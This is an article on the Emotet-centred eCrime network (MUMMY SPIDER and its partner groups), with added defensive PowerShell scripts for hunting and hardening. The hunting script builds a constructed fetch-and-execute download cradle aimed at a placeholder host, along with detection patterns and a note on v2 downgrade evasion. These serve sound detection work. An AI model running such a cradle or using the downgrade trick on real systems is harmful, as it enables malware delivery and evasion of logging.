Caught in the spider’s web: demystifying the eCrime cyber network

John Titmus, director EMEA at CrowdStrike, observes the rise of eCrime activities and explores what can be done to mitigate the risks
One thing was clear in 2018: law enforcement efforts have not yet halted or deterred eCrime actors and their cybercrime campaigns. Throughout the year CrowdStrike observed the rise of ‘Big Game Hunting’ tactics being leveraged in pursuit of financial payoff, along with a range of criminal adversaries engaging in notably more aggressive intrusions.
eCrime was prominent in 2018. Common adversaries operating within criminal networks were tracked conducting a range of operations, including crimeware distribution, banking Trojans, ransomware, point-of-sale compromises and targeted spear-phishing campaigns. However, one of the most concerning eCrime trends was the solidification of a prominent eCrime ‘ecosystem’.
Much like a nation-state, eCrime adversaries rarely work alone, and in 2018 the malware distribution threat MUMMY SPIDER solidified new and existing relationships, cementing the reality of a serious eCrime ecosystem of adversaries. MUMMY SPIDER now sits in the centre of a web of advanced eCrime adversaries which cover a range of attack tactic expertise, from ransomware, to point of sale, to banking trojans. Collaboration between these groups has only made the collective stronger, and in order to defeat them we need to understand the entire network.
In order to untangle this web of e-criminals, we need to find the driver of the network and understand their motivations and approaches to cyber-attacks, which in turn will allow us to understand what connects these actors together – and eventually cut the head off the snake.
The head of the serpent: MUMMY SPIDER
MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. It first appeared in mid-2014 and swiftly became a formidable adversary by developing increasingly aggressive forms of malware. It does not follow typical criminal behaviour patterns: it usually conducts attacks for a few months, goes underground for a period of three to 12 months, and then returns with a new malware variant.
In 2017, the adversary made a conscious shift away from using banking trojans to a crimeware downloader service. Furthermore, in 2018 it made efforts to render its malware more resilient, and thus more attractive to potential ‘customers’. MUMMY SPIDER conducts regular waves of spam campaigns to spread Emotet: these campaigns often use general invoicing and payroll themes. Following infection, Emotet uses geo-targeting to determine which payload to deliver to the victim machine. Over the summer of 2018, in addition to supporting the download of TinyLoader, TrickBot and ZeuS Panda, CrowdStrike Intelligence observed Emotet infections propagating MUMMY SPIDER’s own SMB Spreader to machines in the US, Canada, Germany, UK, Japan and Australia.
In 2018, MUMMY SPIDER solidified its eCrime stronghold, arming itself with a web of pre-existing and new relationships with other adversaries. It continued supporting WIZARD SPIDER (a Russian-based threat group) through the latter half of the year, while adding geo-targeted distribution for BokBot (operated and developed by LUNAR SPIDER, an Eastern European-based banking malware operator) and Gozi ISFB. INDRIK SPIDER (a sophisticated eCrime group that has been operating Dridex since June 2014) was also seen to continue its historic relationship with MUMMY SPIDER during 2018, although downloads of Dridex by Emotet remain rare. Other members of this established network include individual operators such as Panda Zeus, Nymaim and Gootkit.
Into the tangled web: why multiple spiders are worse than one
To illustrate why a network of e-criminals presents a greater challenge for those within the cyber-security industry, we can use a recent example of MUMMY SPIDER activity. In November 2018, a significant phishing campaign was identified which was having widespread effects. Based on the sheer volume of victims, it turned out to be one of the largest Emotet campaigns ever observed by a cyber-security firm. CrowdStrike was able to attribute this activity with high confidence to MUMMY SPIDER. (CrowdStrike uses the naming convention ‘SPIDER’ to identify eCrime groups around the globe.)
The phishing campaign by MUMMY SPIDER consisted of a malicious macro-enabled Microsoft Word document sent as an email attachment. When a recipient opened the weaponised document on a machine where macros were enabled, which is quite typical, the macro launched an obfuscated PowerShell command. That command retrieved an Emotet dropper from remote C2 infrastructure, which in turn downloaded the Emotet malware as the first-stage implant. Once a machine was infected, further malware was delivered to it based on its geographic location.
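The chain described above (Office document with a macro, obfuscated PowerShell, staged download) leaves a recognisable trace in process-creation telemetry. The following PowerShell script is an added illustration for this article, not CrowdStrike’s detection logic and not code from the campaign: it runs a few hunting checks over constructed Sysmon-style process records, flagging an Office parent spawning powershell.exe, a hidden window, a base64 -EncodedCommand that decodes to a download cradle and, going one step beyond the paragraph, a -Version 2 downgrade that sidesteps PowerShell 5 logging. The three records, the file paths and the inner command string are invented for the example; the encoded payload is built inside the script so it can be decoded again.

```powershell
# Added example: hunt for Office-spawned, encoded or downgraded PowerShell in process-creation records.
# Input is three constructed Sysmon Event ID 1 style records (constructed, not real telemetry);
# in practice feed it Get-WinEvent output or an EDR export carrying the same three fields.

# The inner command and its encoding are constructed for the example (non-routable host name).
$innerCommand = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"
$encoded      = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($innerCommand))

$records = @(
    [pscustomobject]@{
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = "powershell.exe -NoP -W Hidden -Enc $encoded"
    },
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1'
    },
    [pscustomobject]@{
        ParentImage = 'C:\Windows\System32\cmd.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -Version 2 -NoProfile -Command "Get-Process"'
    }
)

$officeParents = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
# Download-cradle and in-memory execution primitives commonly seen in first-stage loaders.
$cradlePattern = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIEX\b|Invoke-Expression|FromBase64String'

function ConvertFrom-EncodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE text.
    if ($CommandLine -match '(?i)\s-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return $null }
    }
    return $null
}

function Test-SuspiciousPowerShell {
    param([pscustomobject]$Record)
    $reasons = @()
    $parent  = Split-Path -Leaf $Record.ParentImage
    if ($officeParents -contains $parent)                            { $reasons += "spawned by Office process $parent" }
    if ($Record.CommandLine -match '(?i)\s-w(indowstyle)?\s+hidden') { $reasons += 'hidden window requested' }
    if ($Record.CommandLine -match '(?i)\s-v(ersion)?\s+2\b')        { $reasons += 'PowerShell v2 downgrade (bypasses v5 script block logging)' }
    $decoded = ConvertFrom-EncodedCommand $Record.CommandLine
    if ($decoded) {
        $reasons += 'base64-encoded command'
        if ($decoded -match $cradlePattern) { $reasons += "decoded command is a download cradle: $decoded" }
    }
    [pscustomobject]@{
        CommandLine = $Record.CommandLine
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = $reasons
    }
}

# Only the Word-spawned encoded cradle and the v2 downgrade are reported; the scheduled backup script is not.
$records | ForEach-Object { Test-SuspiciousPowerShell $_ } |
    Where-Object Suspicious |
    Format-List CommandLine, Reasons
```

The decode step matters more than any single string match: the raw command line of the first record contains none of the cradle keywords, so a rule that only inspects the visible command line misses it, whereas the parent-process check catches the Office-to-PowerShell hop regardless of how the command is encoded.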
Where the ecosystem came into play was the second-stage malware download. One of the downloads, TrickBot, is attributed to the eCrime actor group WIZARD SPIDER. The other second-stage download, BokBot, is attributed to the eCrime actor LUNAR SPIDER. What intelligence can tell us is that these groups cooperate with MUMMY SPIDER to gain access to Emotet’s victims. MUMMY SPIDER breaks down the door into a weak system and, in turn, allows a flurry of smaller groups to scurry in, take advantage of the foothold and execute further criminal activity while the system remains exposed.
Furthermore, the spider’s web does not stop with MUMMY SPIDER’s immediate associates; we must also consider the further connections these groups have. For instance, INDRIK SPIDER has known connections to TINY SPIDER and SKELETON SPIDER, both of which benefit from malware distributed by INDRIK SPIDER.
Don’t get ensnared: avoid falling into the eCrime web
Whilst the web of e-criminals may seem daunting, there are a range of best practices which businesses can consider in order to protect themselves against these double-fronted attacks. If the first adversary cannot break through your barriers, its partners are locked out as well:
• Develop a post-recovery strategy: Recovery is not the last step in remediating a ransomware attack, as the campaign above clearly illustrates. Organisations need to know how the adversary got in before they can be sure it was successfully ejected.
• Build an incident plan: Review and test that plan to make sure it is up to date and relevant for the threats that face your organisation. Running tabletop simulations improves reaction times, and having incident response retainers ensures you have relevant support.
• Upgrade operating systems: CrowdStrike constantly sees organisations compromised because they haven’t upgraded to supported operating systems or applied relevant critical patches. The savings gained by stretching the life of an outdated system are not worth the risks. Bolstering your defences around these devices can provide some additional protection while working on the upgrade plan.
• Upgrade to PowerShell 5 and remove previous versions: Once script block logging is enabled, this version of PowerShell records the de-obfuscated content of every script block it executes, so security teams can see commands being executed in near real time. If companies updated to version 5 across the enterprise, their own security teams could see what is happening and respond right away. Removing previous versions of PowerShell in the enterprise also prevents downgrade attacks, in which an attacker launches the version 2 engine precisely because it does not produce this logging. The same applies to other applications on your network: security hygiene is key to improving how your network operates.
• Leverage multi-factor authentication (MFA) for all users and privileged access management tools: Make it as difficult as possible for adversaries to obtain and leverage both user and admin credentials from outside your network. Once they have those, they can do whatever they want in the environment. In addition to MFA, a more robust privileged access management process will limit the damage adversaries can do if they get in.
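As a concrete version of the PowerShell item above, added here and not taken from the article or from CrowdStrike: on a Windows 10 or Windows Server 2016 host already running Windows PowerShell 5.1, the script below enables script block and module logging through the same registry values the Group Policy settings write, removes the version 2 engine, and shows how to verify both and how to hunt for past downgrade attempts in the classic log. It assumes an elevated session and that no domain policy overrides these keys; the registry paths, log names, event IDs and feature names are the standard Windows ones.

```powershell
# Added example: harden PowerShell logging and remove the v2 engine on a Windows PowerShell 5.1 host.
# Run from an elevated session. Domain Group Policy, if present, will overwrite these values.

# 1. Confirm the engine this host runs (expect 5.1.x on current Windows 10 / Server 2016+).
$PSVersionTable.PSVersion

$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# 2. Script block logging: event ID 4104 in Microsoft-Windows-PowerShell/Operational,
#    containing the de-obfuscated script text that actually ran.
New-Item -Path "$policy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$policy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 3. Module logging for every module: event ID 4103 records pipeline execution details.
New-Item -Path "$policy\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$policy\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
New-ItemProperty -Path "$policy\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# 4. Remove the v2 engine so "powershell -Version 2" can no longer dodge the logging above.
#    Client OS (Windows 10):
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart
#    Server OS equivalent (uncomment on Windows Server):
# Uninstall-WindowsFeature -Name PowerShell-V2

# 5. Verify after the next restart: a v2 downgrade request must now fail instead of starting an unlogged engine.
powershell.exe -Version 2 -NoProfile -Command '$PSVersionTable.PSVersion.Major'

# 6. Watch script blocks arrive in the operational log (Properties[2] is the script block text).
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5 |
    Select-Object TimeCreated, @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }

# 7. Hunt for downgrades that already happened: engine start events (ID 400) in the classic
#    "Windows PowerShell" log record the EngineVersion that was loaded.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'EngineVersion=2\.' } |
    Select-Object TimeCreated, MachineName
```

Step 4 only takes full effect after a reboot, so run step 5 afterwards; until the v2 engine is gone, step 7 is the only way to see that someone used it, because a v2 session writes no 4104 events at all.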
There are many things that can be done to reduce the risk of intrusion, and employee programmes can also assist with this. If you don’t have all the resources you need, consider working with a third party that offers services such as tabletop exercises, compromise assessments and incident response retainers to build your maturity and hopefully reduce or prevent incidents in your environment.